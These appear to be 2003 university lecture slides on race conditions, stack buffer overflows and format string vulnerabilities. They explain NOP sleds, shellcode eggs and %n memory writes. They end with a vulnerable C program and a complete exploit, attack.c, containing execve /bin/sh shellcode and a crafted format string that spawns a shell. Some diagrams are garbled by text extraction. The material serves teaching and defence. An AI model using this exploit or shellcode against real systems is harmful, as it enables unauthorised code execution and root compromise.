Você está na página 1de 39

An Introduction to Buffer

Overflows and Format String


Vulnerabilities

Lok Kwong Yan


CS392/681 Polytechnic University
November 5th, 2003

Overview
Race Conditions
Concentration in BO and FS
Background Information

Buffer Overflows

Why and How

Format Strings

Process Memory Layout


Exec* functions and fork()
C style function prolog, procedure epilog

Why and How

An Example

Race Conditions
Anomolous behavior due to unexpected critical
dependence on the relative timing of events.
(dict.die.net)
Focus
What if the event is access to a resource?
What if the resource is a file? (In Linux
Everything is a File)
What if we can get access to the file before the
original process?

RC 2 An Example

1.

2.

Binmail [1] is used to deliver mail to users, by


writing messages to users mailboxes (files)
Given the following pseudo-code what can we
do?
Use the system call (lstat2) to get information
about the mailbox. This is used to detect
symbolic links, if file is a symbolic link, it will
die.
Assuming the file is not a sym-link, append the
letter to the mailbox AS ROOT.

RC 3 An Example Cont

Notice that step one checks to make sure


that the file is not a symbolic link, what if
we can change the file into a sym-link after
that step but before step 2?
If we can do so, then we can write to any
file on the system, since step 2 is done as
root.

BOFS - Background Information

Memory

Organized in 4 byte words


In Intel (what most of us use), word stored in little-endian order (Lowest
Byte Number First)

Ex. 0xFFEEDDCC is stored as FFEEDDCC


byte # 3 2 1 0 is stored as 3 2 1 0
Ex2. String Lok is stored as \0 k o l (\0 = NULL)
byte #
012 is stored as 3 2 1 0
The reason why the storage of the string seems backwards is because in
strings (arrays) the byte number is the offset, which goes left to right, and in
integers the byte number is the significantness where 0 is the least
significant.

Interested Registers (Intel Specific)

IP (Instruction Pointer)
EBP (Extended Base Pointer)
ESP (Extended Stack Pointer)

Process Memory Layout

The different sections

Code (Processor Instructions)


Data (Variables) Local and Global
Stack
Arguments and Environment Variables
Heap

Process Memory Layout 2

PML 3 An Example

Given the following program

int globalInt;
int main(int argc, char *argv[])
{
int localInt;
char localChar;
char* heapChar = malloc(1);
}

Compiled to a.out and ran:

# a.out Arg1 Arg2

Environment of home=/

PML 4 Memory Snapshot

<-Error

PML 5 Exec* and fork()

exec* - A family of functions to start a


process

fork() Not the utensil

Replaces current process space


Creates a new process space and copies
current memory to new memory

fork(), exec() combo to execute programs


in linux

PML 6 Function Prolog/Epilog

Pushes arguments from last to first into


the stack then processes following
assembly code

call procedure
;pushes ip into stack
;inside procedure this is the procedure prolog
push %ebp
mov %esp, %ebp
sub $x, %esp
;x is total size in bytes of arguments

Epilog restores saved values from the


stack

Buffer Overflows

A buffer is storage space in a program, usually


an array
The Problem (inherent trust in users):

CS courses tell us to assume that user input is


always less than a certain constant
Improper bounds checking
Time of check to time of use

Two Kinds

Well known buffer overflow (*cpy functions)


Off by 1 error

BO 2 Buffer Overflow from *cpy

Array cpy functions do not do bounds checking: strcpy()


,memcpy(), etc

Though memcpy and *ncpy functions take in a number for the


maximum number of characters to copy, it still does not make
sure that the target has that much space available

Example: strcpy(char* tar, char* src)

Continues copying characters from src to tar until a NULL is


reached in src
If strlen(src) >= sizeof(tar) then a buffer overflow occurs
What happens? -> Next Slide

BO 3 strcpy() example

Actual Example, given:

int i = 0xffffffff; char[4] ca; strycpy(ca,0123A);


//strlen(source) = 5, sizeof(ca) = 4, problem!!!

Before
After
0xbffffffb
0xffffff
0xbfffffffb
0xffff0041
0xbffffff8
0x00000000 0xbffffff8
3' '2' '1' '0'

i was overwritten!! overflow occurred

BO 4 Off by 1 errors

Results from using wrong limits for loops


Actual Example, given:

int i = 4; char[i] ca; for(int j = i; j >= 0; ca[j++] = A);

Before
0xbffffffb
0xbffffff8

After
4
0xbfffffffb 0x00000041
0x00000000 0xbffffff8
"AAAA"

i was overwritten!! overflow occurred

BO 5 A Little Fun
What is the output of the following code snippet?
int counter;
char[4] ca;
for(counter = 0; counter < 100; ++counter)
{
sprintf(ca,abcd);
printf(%d,counter);
}

BO 6 What Can We Do With


Buffer Overflows?

If the src string is selected properly, then we can rewrite


important information

Ex. Redirect where the function returns (change the saved ip to


anything we want such as to run code to start a shell [a rootshell is the holy-grail of attacks since it means you have full
control of the target machine, so anything closer to that is a good
thing])

Egg a well formatted string that (usually) contains

A nop region
A shellcode region
Return address region

And is the source string that is used to overflow the


buffer, we will get a better idea next ->

BO 7 Egg Components

Nops (0x90) are our best friend, since it is a one byte


instruction and does nothing (therefore no adverse
effects) and IP redirection does not have to be exact,
any address within nop region is fine
Nops are used to pad a safe area where the instruction
pointer can point to and we will get our desired result,
running of the shellcode
Shellcode is machine code that opens a shell

Where to get it? (easy Google, hard gdb)

Return address region is an address that points to the


nop region

BO 8 Structure of an Egg
In buffer overflows, the egg is usually in the form
of:
nop,nop,nop,nop,shellcode,ret,ret,ret
After
We want this structure because since
Why? 0xbffffffb Before
Saved RET 0xbfffffffb ret (0xbffff010) instructions get processed from down to

0xbffffff8

0xbffff000

Saved EBP 0xbffffff8

Buffer

0xbffff000

ret
ret
ret
ret
ret

(0xbffff010)
(0xbffff010)
(0xbffff010)
(0xbffff010)
(0xbffff010)

e
lcod
shel

nop
nop
nop
nop

up, if we are able to have the return


address overwrite the saved IP, when
the current function ends, the saved IP
(now ret) will be the next instruction to
process. Since the next instruction is in
the nop region, as the instructions get
processed, it goes farther and farther up
the stack until the shellcode gets
processed and finally a shell is opened.
(Note that any code can be run, not just
shell code)

Format Strings

Format String vulnerabilities result from


improper use of functions that use format strings
(printf class of functions)
Format strings are extremely powerful

View any memory location


Alter any memory location (IP?)
Easily crash a program

But, they are hard to come by (They do not


result from assumptions like in Buffer Overflows,
they are simply misunderstandings of how the
printf family of functions should or can be used)

FS 2 printf()

printf(char* fstr, )

fstr is the format string


variable list of arguments that fstr should be
processing

fstr is a string that may contain special escape


sequences that tell printf() how to format the
output, (how to treat the byte stream)
Common escape sequences are %x, %u, %d,
%c, %s, (%n?)

FS 3 printf() algorithm
for each char in fstr until NULL
if curChar == % then
switch (nextChar)
case % : write a % to output
case x : pop* a word off the stack and write that word as hex to output
case s : pop* a word off the stack, treat that as a pointer to a
character array, starting at that position write each
character to output until 0 is reached
case n : pop* a word from the stack and treats it as an address, writes the
number of characters written so far to that address

else
write curChar to output
*Popping a word off the stack for format string functions does not mean use the pop instruction. It
means read a word off the stack starting at EBP+4 (This is where the 2nd parameter passed to
printf() starts and incrementing by 4 bytes each pop (read).

FS 4 The Problem

All printf() needs to compile is a char* as the first


parameter. There is no check to make sure the number
of parameters is equal to the number specified in the
format string
Since the format string sequences do not appear in
natural English, when programmers use printf()
improperly, it is not evident during normal execution of
the program.
Programmers are uneducated about the pre and post
conditions of the printf family of functions as well as
other functions such as strcpy functions. Without a good
understanding of how these functions work, we can
never use them properly

FS 6 Improper use of printf() an


example

Given the following code:

printf(message);

What is output if message = Hi my name is Lok.?

Hi my name is Lok. No problems expected normal use

What if message = %08x %08x?

Well these are format string escape sequences which means printf() will process them.
If memory of printf() looks like this
0xbffffffb
0xbffffff8
0xbffffff4
0xbffffff0
0xbfffffeb

0x000000ff (stuff on stack)


0x0000ffff (stuff on stack)
add of "% 08x% 08x"
Saved RET (0x080000ff)
Saved EBP (0xbfffffff)

Since the first %08x will take the word starting from EBP+4 (From Function Prolog
EBP points to word right above Saved RET) and the second will take the word from
EBP+8 the output will look like
0000ffff 000000ff : Problem unexpected string in message (Who would have thought
a message would contain weird %08x in it)

FS 5 A (im)Proper Format String

Given the proper format string, we can do


whatever we want! Lets say we want to change
a word in memory.
What I like to use

%--x pops a word from the stack and prints it out in character spaces
%n pops a word from the stack and treats it as an address, writes the number
of characters written so far to that address.
%hn same as %n but only writes to 2 bytes of address specified by stack pop

A general format of a format string is


targetAdd, stackpops, writes

targetAdd is the address we wish overwrite


Stack pops are operations to traverse up the stack until we get to a section of
memory that is of interest, such as where targetAdd is
Writes are the %n operations, this actually does the writing to memory

FS 6 The Procedure

The procedure for a simple attack is


1.

2.

3.

Place the target address (in our case its part


of the format string itself) on the stack
Use stackpops to traverse up the stack until
you reach the targetAdd
Use %ns to write to memory pointed to by
targetAdd

FS 7 Some Things to Know


1.

2.

3.

Split format string attack into two parts. First find out
how many %xs it takes to get back to the start of the
format string (to targetAdd) then try to do the attack
To write to a memory address, have two targetAdds
separated with a dummy word
(targetAdd,dummyword,targetAdd+2) This way we can
use the combination %hn %--x %hn to write a whole
word specified by targetAdd where -- is the proper
number so targetAdd+2 contains the 2-byte value of
our choice
The counter that keeps track of number of characters
written to output is 16 bits, and it cycles.

FS 8 An Example

Given the following program and memory


snapshot, what is the format string that will give
us a root shell?

char[128] egg= "..." //where ... is nops and shellcode


char[128] carr= "FormatString" //where FormatString is what we need
printf(carr);
We can readily see that the target address we want to change
Is the address of the saved IP which is 0xbffffe68, we can
Also see that we need exactly 1 %xs to get to the beginning
Of our format string. We also see that since the NOP region
Starts at address 0xbffffef0 that is the value we want to write
Into IP.

FS 9 The Attack String


Target Add is 0xbffffe68, so we want to start
with, 0xbffffe68 0xffffffff 0xbffffe6a
We want to write 0xbffffef0 to the target add, and
so bfff goes to fe6a and fef0 goes to fe68, in
decimal the values are, 49151 and 65264
respectively.
Finally the format string looks like:
\x6a\xfe\xff\xbf\xff\xff\xff\xff\x68\xfe\xff\xbf
%49139x%hn%16113x%hn;

Some Fun Stuff/Notes

Buffer Overflows
DOS with

Overflow with src =


\xff\xff..

No Printing Of Memory

Format Strings
DOS with

Use %s%n%s%n
Use %f%f

Print memory with

Use %x

A Real Example (killme.c)


#include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main(int argc, char *argv[])
{
char message[100] = "Hello ";
char *source;
if ( (source = malloc(50*sizeof(char))) == NULL)
{
printf("Couldn't put anything onto heap\n");
exit(1);
}
//This is the lazy way of getting address information, proper way
// would be through gdb
printf("%08x . %08x . %08x\n", argv[1], &source, &message);
//this is a secure copying
strncpy( (char *)((char *)message + 6), argv[1], 93);
printf(message); //just says hello and whatever we put in
//debug messages to show that it actually works
printf("\n\nMessaged Printed Out:\nCopying Buffers\n\n"
"%08x was written to source\n"
"Source is: %s\n", source, source);
//This should be a safe string cpy since source was malloced for
// only 50 characters and message can hold 100
strcpy(message,source);
return(0);
}

Code Analysis

We should see the following problem:

printf(message);

Since message is partially user supplied, it


cannot be trusted!!
A not so obvious problem is,

strcpy(message,source);

Though its true that source should be 50


characters long, if we can change where source
points to, then we can do a buffer overflow

The Attack
To illustrate both buffer overflows and
format string attacks I will use a format
string attack to change the address
where source is pointing to, to a string of
my choice so as to cause a buffer
overflow and open a shell

TA 2 Format String

As mentioned before, we want the following format string format:

\xec\xee\xff\xbf\xff\xff\xff\xff\xea\xee\xff\xbf
%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x
%00008x%8x%00008x%8x
\x90\x90\x90\x90\x90\x90\x90\x90\x90
shellcodeRETRETRETRETRETRET

First line is reserved space for the return address


Second line is the stack popping operations
Third line is reservations for memory writing, where %8x will turn into %hn
and %00008x will turn int %-----x where ----- is the number to get the 2-byte
we want. We want to reserve the space so that we can take care of any
offset problems now, and when the final attack comes around, the number
of characters and their offsets are exactly the same
Fourth line is the nop region
Fifth line is where the shellcode and return addresses go
After discovering the addresses I want to overwrite and their values. The
following code results. ->

TA 3 Attack Code (attack.c)


int main()
{
char temp[4096] ="\xff\xff\x6e\xf9\xff\xbf\xff\xff\xff\xff\x6c\xf9\xff\xbf"
"%08x%08x%08x%08x%08x%08x%08x%08x%49067x%hn%15243x%hn"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29"
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf"
"\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf\x74\xf9\xff\xbf";
execl("/home/lok/format/format2/killme.bin","killme.bin",temp,0);
return(0);
}

TA 4 Notes

You dont have to start a shell. These are just tools, use
them to your hearts content.
The exploit code is machine and even instance
dependent, the addresses that works for one machine
may not work for another. (Think about the environment
and arguments memory area.)
The points made here are labor intensive, there are
papers that describe how to automate the process of
finding the addresses and building the proper length
strings.
The only proper way to prevent these problems is
through the education and understanding of the
functions being used.

References
[1] Race Conditions, Files, and Security Flaws; or
the Tortoise and the Hare Redux Matt Bishop
http://seclab.cs.ucdavis.edu/projects/vulnerabiliti
es/scriv/ucd-ecs-95-08.pdf
[2] "Smashing the Stack for Fun and Profit Aleph
One
http://www.shmoo.com/phrack/Phrack49/p49-14

Questions?

Ask them now


Ask them later
email - I think not!
Ask them never

Você também pode gostar